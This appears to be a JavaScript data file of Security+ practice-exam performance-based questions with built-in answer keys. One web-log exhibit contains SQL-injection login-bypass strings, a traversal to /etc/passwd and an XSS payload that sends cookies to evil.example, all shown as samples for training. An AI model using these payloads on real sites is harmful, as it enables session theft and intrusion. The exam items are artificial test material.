/* Exam PBQs — 5 per exam, presented first. Types today: diagram | appanel | hardening | exhibit | hashid | fwrule | risk.
   Target mix after Chat 2 merges (see dev/PLAN.md §3): every exam ≥1 console + ≥1 firewall editor; the swap plan is in dev/FIDELITY-secplus.md.
   Generated types (hashid/fwrule/risk) make a fresh problem every attempt; never two of the same generated type in one exam.
   exhibit = one exhibit with several sub-questions (first option correct; the engine shuffles). */
export const EXAM_PBQS = {
a: [
 {id:"pa1",obj:"3.2",d:3,cat:"netsec",type:"diagram",title:"Hospital network: place the security devices",
  prompt:"Drag each device from the palette onto the slot whose job it performs. Not every device is used.",
  task:["Slot A separates the Internet from every hospital zone.","Slot B watches a mirrored copy of clinical-VLAN traffic; it must never be able to interrupt an infusion pump or monitor.","Slot C protects the public patient portal from injection and scripting attacks at the HTTP layer.","Slot D is the hardened host that imaging-vendor engineers must log in to before they can reach the PACS servers."],
  nodes:[{id:"inet",label:"Internet",x:52,y:150,k:"cloud"},{id:"core",label:"Core switch",x:240,y:150,k:"sw"},{id:"dmz",label:"DMZ",x:360,y:90,k:"zone",w:224,h:130},{id:"portal",label:"patient-portal",x:420,y:70,k:"srv",w:92},{id:"clin",label:"Clinical VLAN",x:360,y:240,k:"zone",w:224,h:100},{id:"pumps",label:"Infusion pumps",x:310,y:245,k:"pc",w:92},{id:"pacs",label:"PACS servers",x:420,y:245,k:"srv",w:88}],
  links:[["inet","A"],["A","core"],["core","C"],["C","portal"],["core","D"],["D","pacs"],["core","pumps"],["core","B"]],
  slots:[{id:"A",label:"A · Edge",x:144,y:150,want:["firewall","ngfw"]},
         {id:"B",label:"B · mirror copy",x:144,y:245,want:"ids",why:"Out of band on a SPAN/mirror feed means passive: detect and alert only. Clinical devices cannot tolerate an inline device dropping their traffic."},
         {id:"C",label:"C · portal HTTP",x:318,y:70,want:"waf"},
         {id:"D",label:"D · vendor hop",x:318,y:136,want:["jump","bastion"],why:"A jump box is the single, logged, MFA-protected entry point for third-party administration."}],
  palette:["firewall","ids","ips","waf","jump","vpn","proxy","lb"],
  why:"Firewall at the edge, IDS (passive) on the mirror port where availability matters most, WAF for the web app, jump box for vendor access. IPS vs IDS is decided by whether the slot is inline."},
 {id:"pa2",obj:"4.1",d:4,cat:"harden",type:"appanel",title:"School district: configure the student SSID",
  prompt:"Set the fields the ticket names and nothing else.",device:"AP-HS-LIB-02",deviceSub:"Student wireless profile",
  task:["SSID District-Students on both bands.","Every Chromebook carries a device certificate from the district CA; students must authenticate with that certificate, not a password.","Use the strongest security mode that supports per-device authentication; RADIUS server 10.20.0.15, port 1812, shared secret Lib3rty-Owl-4471.","Students must not be able to reach one another's devices over the wireless network."],
  start:{ssid:"District-Students",hidden:false,band:"2.4 + 5 GHz",mode:"WPA2-Personal",psk:"students2024",eap:"PEAP (MSCHAPv2)",radiusHost:"",radiusPort:"1645",radiusSecret:"",pmf:"Required",wps:false,macFilter:"Off",isolation:false,mgmtWifi:false,adminDefault:"Changed to a unique strong password"},
  want:{mode:["WPA3-Enterprise","WPA3-Enterprise 192-bit"],eap:"EAP-TLS",radiusHost:"10.20.0.15",radiusPort:"1812",radiusSecret:"Lib3rty-Owl-4471",isolation:true},
  fieldWhy:{eap:"Certificate on the client = EAP-TLS. PEAP/EAP-TTLS carry a password inside the TLS tunnel.",isolation:"Client isolation stops peer-to-peer traffic on the SSID, so one infected Chromebook cannot scan the rest."},
  why:"Device certificates → EAP-TLS over WPA3-Enterprise with RADIUS. Client isolation for untrusted peers. A shared passphrase would mean one leaked password for the whole district."},
 {id:"pa3",obj:"1.4",type:"hashid",d:1,cat:"crypto",title:"Identify the hash",prompt:"Read the digest, name the algorithm, give its bit length.",task:["Count the characters and note the encoding (hex or Base64).","Pick the algorithm that produces a digest of that length.","Enter the digest length in bits."]},
 {id:"pa4",obj:"4.9",type:"exhibit",d:4,cat:"ops",title:"Exhibit: read the authentication log",
  setup:"A hospital SOC receives the following SIEM entries for a nurse's account.",
  out:"07:58:12  LOGIN OK      user=r.patel  src=10.40.12.55   geo=Cincinnati US  mfa=push\n08:03:40  LOGIN OK      user=r.patel  src=185.220.101.9  geo=Frankfurt DE   mfa=push\n08:04:02  RULE ADDED    mailbox=r.patel  action=forward-all  to=rpatel.backup@mail-relay.example\n08:04:30  LOGIN FAIL x6 user=r.patel  src=185.220.101.9  reason=bad_password\n08:05:10  MFA PROMPT    user=r.patel  result=approved   src=185.220.101.9",
  qs:[
   {q:"Which indicator MOST strongly suggests the account is compromised?",o:["Impossible travel: two successful logins 5 minutes apart from Cincinnati and Frankfurt","Six failed passwords at 08:04","The user logged in before 08:00","MFA push was used instead of a hardware key"],x:"Two successful sessions from continents apart within minutes is the impossible-travel indicator. Failed passwords alone could be a typo; login time and MFA method are normal."},
   {q:"What does the 08:04:02 entry MOST likely represent?",o:["Persistence and exfiltration: the attacker set an auto-forward so mail keeps flowing out even after a password reset","A legitimate out-of-office rule","A mail-server maintenance task","Evidence the account was locked out"],x:"External auto-forward rules are a classic business email compromise step: they survive credential resets and quietly copy every message to the attacker."},
   {q:"What does the 08:05:10 entry suggest about the MFA control?",o:["The user approved a push they did not initiate (MFA fatigue / prompt bombing), so number matching or a phishing-resistant factor is needed","MFA is working as designed","The attacker has the user's hardware token","MFA was never enabled on the account"],x:"A push approved from the attacker's IP after a burst of failures is prompt-bombing: the victim tapped Approve to make the prompts stop. Number matching or FIDO2 keys defeat it."},
   {q:"Which of the following is the BEST FIRST action?",o:["Disable the account, revoke all sessions and tokens, and remove the forwarding rule","Email the user to ask whether they are traveling","Reset the password only","Open a ticket with the mail vendor"],x:"Contain first: cut the attacker's access (account, sessions, rule). Asking the user or resetting only the password leaves active sessions and the forward in place."}
  ],
  why:"Impossible travel plus a new external forward plus an approved MFA push after failures = takeover with MFA fatigue. Contain (disable, revoke, remove rule), then investigate."},
 {id:"pa5",obj:"4.1",d:4,cat:"harden",type:"hardening",title:"Software company: harden the build server",
  prompt:"Reduce the attack surface of the CI server without stopping the builds.",host:{name:"ci-build-01",os:"Ubuntu Server 22.04",role:"Runs the CI controller on TCP 8080 for the engineering network (10.30.0.0/16); builds run in local containers; engineers SSH in with keys"},
  task:["Builds and the CI web console must keep working for the engineering network, and only for it.","Engineers already use SSH keys; passwords must no longer be accepted over SSH, and root may not log in directly.","Remove the cleartext services, the anonymous CI access and the default admin credential the audit flagged.","Turn on the host firewall with default-deny inbound and automatic security updates."],
  groups:[{id:"svc",label:"Services"},{id:"net",label:"Network access"},{id:"acct",label:"Accounts & SSH"},{id:"base",label:"Baseline"}],
  controls:[
   {id:"ci",g:"svc",l:"CI controller service",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true},
   {id:"docker",g:"svc",l:"Container runtime (builds)",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true,why:"Builds run in containers."},
   {id:"ftp",g:"svc",l:"vsftpd (artifact drop, cleartext)",t:"toggle",on:"Running",off:"Stopped",start:true,want:false},
   {id:"telnet",g:"svc",l:"telnetd",t:"toggle",on:"Running",off:"Stopped",start:true,want:false},
   {id:"p8080",g:"net",l:"TCP 8080 (CI console) allowed from",t:"select",o:["Any","Engineering 10.30.0.0/16 only","Closed"],start:"Any",want:"Engineering 10.30.0.0/16 only"},
   {id:"fw",g:"net",l:"Host firewall (ufw)",t:"toggle",on:"Enabled",off:"Disabled",start:false,want:true},
   {id:"fwpol",g:"net",l:"Default inbound policy",t:"select",o:["Allow all","Deny all except allowed rules"],start:"Allow all",want:"Deny all except allowed rules"},
   {id:"anon",g:"acct",l:"Anonymous read access to the CI console",t:"toggle",on:"Allowed",off:"Disabled",start:true,want:false,why:"Build logs leak secrets, hostnames and dependency versions."},
   {id:"ciadmin",g:"acct",l:"CI admin credential",t:"select",o:["Default (admin / admin)","Unique strong password + MFA"],start:"Default (admin / admin)",want:"Unique strong password + MFA"},
   {id:"sshauth",g:"acct",l:"SSH authentication",t:"select",o:["Password or key","Key only"],start:"Password or key",want:"Key only",why:"Keys cannot be guessed or sprayed; password auth is what botnets hammer."},
   {id:"rootssh",g:"acct",l:"PermitRootLogin",t:"toggle",on:"Yes",off:"No",start:true,want:false},
   {id:"sshd",g:"acct",l:"sshd",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true,why:"Engineers need SSH."},
   {id:"upd",g:"base",l:"Unattended security updates",t:"toggle",start:false,want:true},
   {id:"fde",g:"base",l:"Full-disk encryption",t:"toggle",start:false,why:"Not part of this ticket."}
  ],
  why:"Same pattern every time: keep the business function (CI, containers, SSH), scope what it listens to (engineering network only), kill cleartext services and anonymous/default access, strengthen the admin path (keys only, no root), baseline controls on (firewall default-deny, auto-patch)."}
],
b: [
 {id:"pb1",obj:"4.1",d:4,cat:"harden",type:"appanel",title:"Trading floor: configure the high-security SSID",
  prompt:"The traders' wireless profile must meet the bank's top tier. Change only what the standard requires.",device:"AP-TRD-11",deviceSub:"Trading floor wireless profile",
  task:["SSID TradeFloor on 5 GHz only.","Use the highest-assurance Enterprise mode the standard names: the 192-bit suite.","Traders' laptops hold certificates from the bank's PKI; authenticate with those certificates.","The RADIUS server (172.16.40.5, port 1812) is already configured; keep it. Management frames must be protected on every client."],
  start:{ssid:"TradeFloor",hidden:false,band:"2.4 + 5 GHz",mode:"WPA2-Enterprise",psk:"",eap:"PEAP (MSCHAPv2)",radiusHost:"172.16.40.5",radiusPort:"1812",radiusSecret:"Vault-Cobalt-8835",pmf:"Optional",wps:false,macFilter:"Off",isolation:false,mgmtWifi:false,adminDefault:"Changed to a unique strong password"},
  want:{band:"5 GHz",mode:"WPA3-Enterprise 192-bit",eap:"EAP-TLS",pmf:"Required"},
  fieldWhy:{mode:"WPA3-Enterprise 192-bit mode mandates the CNSA cipher suite (GCMP-256, 384-bit curves) for high-security environments.",eap:"192-bit mode requires EAP-TLS with suitable certificates; password-based methods are not permitted."},
  why:"Highest tier = WPA3-Enterprise 192-bit + EAP-TLS + PMF required. Fields that were already correct (RADIUS details) stay; fields that were never requested (hidden SSID, MAC filtering) stay too."},
 {id:"pb2",obj:"4.1",d:4,cat:"harden",type:"hardening",title:"Plant OT: harden the engineering workstation",
  prompt:"Bring the PLC programming workstation to the OT baseline without breaking the engineers' work.",host:{name:"ENG-WS-03",os:"Windows 10 LTSC",role:"PLC programming station on the OT network; the vendor's engineering software downloads logic to PLCs; engineers RDP in from the engineering VLAN (10.0.5.0/24)"},
  task:["The PLC programming software and its OT network connection must keep working.","The workstation is dual-homed: remove its path to the office LAN and its wireless radios.","Engineers remote in only from the engineering VLAN. Removable storage is prohibited on OT. Engineers are not local administrators.","Patch only in the monthly outage window; the EDR agent must be running and the disk encrypted. SMBv1 goes."],
  groups:[{id:"net",label:"Network interfaces"},{id:"remote",label:"Remote access"},{id:"acct",label:"Accounts & media"},{id:"base",label:"Baseline"}],
  controls:[
   {id:"otnic",g:"net",l:"OT network adapter (10.0.200.0/24)",t:"toggle",on:"Enabled",off:"Disabled",start:true,crit:true,why:"That is the link to the PLCs."},
   {id:"officenic",g:"net",l:"Office LAN adapter (10.0.10.0/24)",t:"toggle",on:"Enabled",off:"Disabled",start:true,want:false,why:"A dual-homed host is a bridge between the IT and OT networks; attackers pivot across it."},
   {id:"wifi",g:"net",l:"Wi-Fi radio",t:"toggle",start:true,want:false},
   {id:"bt",g:"net",l:"Bluetooth radio",t:"toggle",start:true,want:false},
   {id:"rdp",g:"remote",l:"Remote Desktop allowed from",t:"select",o:["Any","Engineering VLAN 10.0.5.0/24 only","Off"],start:"Any",want:"Engineering VLAN 10.0.5.0/24 only",why:"'Off' locks the engineers out."},
   {id:"ra",g:"remote",l:"Remote Assistance",t:"toggle",start:true,want:false},
   {id:"plcsw",g:"acct",l:"PLC engineering software service",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true},
   {id:"localadmin",g:"acct",l:"Engineers group",t:"select",o:["Local Administrators","Standard users (elevate via PAM)"],start:"Local Administrators",want:"Standard users (elevate via PAM)"},
   {id:"usb",g:"acct",l:"USB mass storage",t:"toggle",on:"Allowed",off:"Blocked",start:true,want:false},
   {id:"patch",g:"base",l:"Windows Update",t:"select",o:["Automatic, reboot when required","Monthly outage window via WSUS","Disabled"],start:"Automatic, reboot when required",want:"Monthly outage window via WSUS",why:"An unscheduled reboot mid-download can corrupt PLC logic."},
   {id:"edr",g:"base",l:"EDR agent",t:"toggle",on:"Running",off:"Stopped",start:false,want:true},
   {id:"fde",g:"base",l:"BitLocker",t:"toggle",start:false,want:true},
   {id:"smb1",g:"base",l:"SMBv1",t:"toggle",on:"Installed",off:"Removed",start:true,want:false},
   {id:"hostfw",g:"base",l:"Host firewall",t:"toggle",start:true,crit:true,why:"It enforces the RDP source restriction; nothing asked you to turn it off."}
  ],
  why:"OT hardening: no dual-homing, no radios, no removable media, least privilege, remote access from one VLAN, patches in the outage window. Availability of the production link is non-negotiable."},
 {id:"pb3",obj:"4.5",type:"fwrule",d:4,cat:"ops",title:"Firewall rule evaluation",prompt:"Walk the rule table top-down for the packet shown.",task:["Compare the packet's source, destination and port against each rule from the top.","Stop at the first rule where all three match; that rule's action applies.","If nothing matches, the implicit deny at the bottom applies."]},
 {id:"pb4",obj:"2.4",type:"exhibit",d:2,cat:"attacks",title:"Exhibit: web server log",
  setup:"A cloud startup's web application firewall is in monitor-only mode. The access log shows these requests from one client in under a minute.",
  out:"203.0.113.77 GET /login?user=admin'--&pass=x                       200\n203.0.113.77 GET /login?user=admin' OR '1'='1&pass=x               200\n203.0.113.77 GET /search?q=<script>document.location='http://evil.example/c?'+document.cookie</script> 200\n203.0.113.77 GET /files?name=../../../../etc/passwd                 403\n203.0.113.77 GET /api/orders?id=1000                                200\n203.0.113.77 GET /api/orders?id=1001                                200\n203.0.113.77 GET /api/orders?id=1002                                200",
  qs:[
   {q:"What are the first two requests attempting?",o:["SQL injection to bypass authentication","Cross-site scripting","Directory traversal","Credential stuffing with a leaked password list"],x:"Quote-and-comment (admin'--) and the always-true OR '1'='1 are authentication-bypass SQL injection payloads. XSS uses script tags; traversal uses ../; stuffing uses many real credential pairs."},
   {q:"What is the third request attempting, and who is the victim?",o:["Reflected cross-site scripting that steals another user's session cookie","A denial of service against the search index","SQL injection against the search table","A brute-force attack on the search function"],x:"The script tag sends document.cookie to an attacker host; if the search page echoes input, any user tricked into that URL leaks their session. The server is the carrier, the user is the victim."},
   {q:"The 403 on the fourth request shows which control worked?",o:["Input validation or path restriction blocked directory traversal","The WAF blocked the request","Rate limiting blocked the client","TLS prevented the download"],x:"../ sequences reaching for /etc/passwd is directory traversal; a 403 means the app or web server refused the path. The WAF is in monitor-only mode, so it did not block."},
   {q:"What do the last three requests suggest, and what is the BEST fix?",o:["Sequential IDs are being enumerated (insecure direct object reference); enforce authorization on every object and use non-guessable IDs","Normal browsing; no action","A buffer overflow; patch the API","A DDoS; add more capacity"],x:"Walking id=1000, 1001, 1002 with 200 responses means the API returns other customers' orders without checking ownership. Server-side authorization per object is the fix."}
  ],
  why:"Read payloads: quotes and OR 1=1 are SQLi, script tags are XSS, ../ is traversal, sequential IDs are IDOR. Input validation and server-side authorization are the fixes; move the WAF to blocking."},
 {id:"pb5",obj:"5.2",type:"risk",d:5,cat:"gov",title:"Risk math: SLE, ALE, cost-benefit",prompt:"Compute the loss figures and decide whether the control is worth buying.",task:["SLE = asset value × exposure factor.","ALE = SLE × ARO (events per year).","The control is justified when the ALE it removes exceeds its annual cost. The calculator is in this pane."]}
],
c: [
 {id:"pc1",obj:"4.1",d:4,cat:"harden",type:"hardening",title:"MSP: harden a client's file server",
  prompt:"Apply the MSP's server baseline to the client's file server. Users must still reach their shares.",host:{name:"CLI-FS01",os:"Windows Server 2019",role:"File server for 40 staff over SMB; managed by the MSP through its RMM agent and RDP from the MSP management VPN (10.99.0.0/24)"},
  task:["Staff must keep reaching their shares; the MSP must keep its RMM agent and its RDP path from the management VPN.","Remove the unused FTP role, the Guest account, SMBv1 and the two name-resolution protocols that enable credential relay (LLMNR, NetBIOS over TCP/IP).","Shares must not grant Everyone full control. Forward security logs to the MSP SIEM.","Updates must install automatically and the host firewall must be on."],
  groups:[{id:"svc",label:"Roles & services"},{id:"net",label:"Network access"},{id:"acct",label:"Accounts & permissions"},{id:"base",label:"Baseline & logging"}],
  controls:[
   {id:"smb",g:"svc",l:"File sharing (SMBv3)",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true},
   {id:"smb1",g:"svc",l:"SMBv1",t:"toggle",on:"Installed",off:"Removed",start:true,want:false},
   {id:"ftp",g:"svc",l:"FTP server role",t:"toggle",on:"Installed",off:"Removed",start:true,want:false},
   {id:"rmm",g:"svc",l:"MSP RMM agent",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true,why:"That is how the MSP manages the box."},
   {id:"llmnr",g:"net",l:"LLMNR",t:"toggle",start:true,want:false,why:"LLMNR/NBT-NS poisoning captures NTLM hashes for relay or cracking."},
   {id:"nbt",g:"net",l:"NetBIOS over TCP/IP",t:"toggle",start:true,want:false},
   {id:"rdp",g:"net",l:"Remote Desktop allowed from",t:"select",o:["Any","MSP management VPN 10.99.0.0/24 only","Off"],start:"Any",want:"MSP management VPN 10.99.0.0/24 only"},
   {id:"fw",g:"net",l:"Windows Defender Firewall",t:"toggle",start:false,want:true},
   {id:"guest",g:"acct",l:"Guest account",t:"toggle",on:"Enabled",off:"Disabled",start:true,want:false},
   {id:"shareperm",g:"acct",l:"Share permissions",t:"select",o:["Everyone: Full Control","Authenticated Users: least privilege by group"],start:"Everyone: Full Control",want:"Authenticated Users: least privilege by group"},
   {id:"admin",g:"acct",l:"Built-in Administrator (renamed, strong password)",t:"toggle",on:"Enabled",off:"Disabled",start:true,why:"Nothing in the baseline asked you to touch it, and the MSP may rely on it for break-glass access."},
   {id:"wu",g:"base",l:"Windows Update",t:"select",o:["Automatic (MSP patch policy)","Notify only","Disabled"],start:"Notify only",want:"Automatic (MSP patch policy)"},
   {id:"siem",g:"base",l:"Forward security log to MSP SIEM",t:"toggle",start:false,want:true},
   {id:"fde",g:"base",l:"BitLocker",t:"toggle",start:false,why:"Not in this ticket."}
  ],
  why:"Harden a server by role: keep SMBv3 and the management agent, remove SMBv1/FTP/LLMNR/NetBIOS, scope RDP to the management network, fix the share ACLs, log to the SIEM, patch automatically. Do not break the client's access or the MSP's."},
 {id:"pc2",obj:"3.2",d:3,cat:"netsec",type:"diagram",title:"City government: place the perimeter services",
  prompt:"Place the devices that handle the city's inbound, outbound and remote traffic.",
  task:["Slot A sits inline between the firewall and the core switch and must block known exploits in real time.","Slot B is where employees' encrypted remote-access tunnels terminate.","Slot C is the single egress point for staff web browsing, applying URL filtering and logging.","Slot D scans inbound email for spam, malware and spoofing before it reaches the mail server."],
  nodes:[{id:"inet",label:"Internet",x:52,y:150,k:"cloud"},{id:"fw",label:"Firewall",x:140,y:150,k:"box",w:66},{id:"core",label:"Core switch",x:316,y:150,k:"sw"},{id:"staff",label:"Staff LAN",x:430,y:100,k:"pc",w:76},{id:"mail",label:"mail01",x:430,y:200,k:"srv",w:70}],
  links:[["inet","fw"],["fw","A"],["A","core"],["core","staff"],["fw","B"],["B","core"],["core","C"],["C","fw"],["fw","D"],["D","mail"]],
  slots:[{id:"A",label:"A · inline",x:228,y:150,want:"ips",why:"Inline and blocking = IPS."},
         {id:"B",label:"B · tunnels end",x:228,y:52,want:"vpn"},
         {id:"C",label:"C · browsing egress",x:228,y:248,want:["proxy","webfilter"],why:"A forward proxy / web filter is the one chokepoint for outbound web traffic."},
         {id:"D",label:"D · inbound mail",x:330,y:250,want:"mailgw",why:"An email security gateway applies spam, malware and SPF/DKIM/DMARC checks before delivery."}],
  palette:["ips","vpn","proxy","mailgw","ids","waf","lb","jump"],
  why:"Inline IPS behind the firewall, VPN concentrator for remote access, forward proxy for egress, email gateway in front of the mail server. The IDS, WAF, load balancer and jump box have no job described here."},
 {id:"pc3",obj:"1.4",type:"hashid",d:1,cat:"crypto",title:"Identify the hash",prompt:"Read the digest, name the algorithm, give its bit length.",task:["Count the characters and note the encoding (hex or Base64).","Pick the algorithm that produces a digest of that length.","Enter the digest length in bits."]},
 {id:"pc4",obj:"4.3",type:"exhibit",d:4,cat:"ops",title:"Exhibit: vulnerability scan findings",
  setup:"An MSP runs a credentialed scan for a small law firm. Prioritize the response.",
  out:"ID   HOST            FINDING                                   CVSS  EXPLOIT  EXPOSURE\n1    web01 (DMZ)     Apache 2.4.49 path traversal CVE-2021-41773 9.8   public   internet\n2    file01 (LAN)    SMBv1 enabled                             7.5   public   internal\n3    hr-pc07 (LAN)   Missing browser update                    6.1   none     internal\n4    print01 (LAN)   Default admin credentials                 8.8   trivial  internal\n5    web01 (DMZ)     TLS 1.0 enabled                           5.3   none     internet\n6    db01 (LAN)      Self-signed certificate                   4.3   none     internal",
  qs:[
   {q:"Which finding should be remediated FIRST?",o:["1: critical CVSS, public exploit, internet-facing","4: default credentials are trivial to abuse","2: SMBv1 is what WannaCry used","5: TLS 1.0 on an internet host"],x:"Prioritize by severity, exploitability AND exposure together: 9.8 with a public exploit on an internet-facing host is the most likely to be exploited today."},
   {q:"Finding 4 has no CVE. What is the BEST classification and fix?",o:["Misconfiguration; change the default password and restrict management access","Zero-day; wait for a patch","False positive; ignore","Hardware vulnerability; replace the printer"],x:"Default credentials are a configuration weakness, not a software flaw. Change them and limit who can reach the admin interface; no patch will fix it."},
   {q:"The firm says file01 cannot be upgraded because a legacy scanner needs SMBv1. What is the appropriate response?",o:["Segment and restrict access to file01, document an exception with a compensating control, and set a review date","Ignore the finding since the business accepted it","Disable SMB entirely","Mark it as a false positive"],x:"When patching is not possible, the vulnerability-response options are compensating controls plus a documented exception, not silent acceptance."},
   {q:"After patching web01, what confirms the work is done?",o:["Rescan web01 and verify finding 1 no longer appears","Close the ticket when the admin says it is patched","Wait for the next quarterly scan","Check the CVE page"],x:"Validation means rescanning (or otherwise verifying) that the finding is gone. Ticket notes and vendor pages do not prove the fix is in place."}
  ],
  why:"Prioritize on CVSS × exploit availability × exposure, classify findings correctly (misconfiguration vs software flaw), use exceptions with compensating controls when you cannot patch, and validate with a rescan."},
 {id:"pc5",obj:"4.1",d:4,cat:"harden",type:"appanel",title:"Remote firm: home-office AP standard",
  prompt:"Configure a remote employee's access point to the company standard. Change only what the standard lists.",device:"AP-HOME (employee-owned)",deviceSub:"Home wireless profile",
  task:["Rename the network to Remote-Office.","Use the strongest Personal (passphrase) mode and set a passphrase of at least 16 characters.","Management-frame protection must be required; the push-button setup feature must be off.","Replace the factory admin password and make sure the admin page cannot be opened from the wireless side."],
  start:{ssid:"NETGEAR37",hidden:false,band:"2.4 + 5 GHz",mode:"WPA2-Personal",psk:"happyriver123",eap:"PEAP (MSCHAPv2)",radiusHost:"",radiusPort:"1812",radiusSecret:"",pmf:"Disabled",wps:true,macFilter:"Off",isolation:false,mgmtWifi:true,adminDefault:"Factory default"},
  want:{ssid:"Remote-Office",mode:"WPA3-Personal",psk:{re:"^.{16,}$",label:"any passphrase of 16 or more characters"},pmf:"Required",wps:false,adminDefault:"Changed to a unique strong password",mgmtWifi:false},
  fieldWhy:{mode:"WPA3-Personal uses SAE (a Dragonfly key exchange) so an offline dictionary attack on a captured handshake no longer works.",psk:"Length beats complexity; 16+ characters defeats brute force even where WPA2 fallback exists."},
  why:"Home-office baseline: WPA3-Personal, long passphrase, PMF required, WPS off, factory admin password gone, management off the wireless side. The band and SSID visibility were not part of the standard."}
]
};
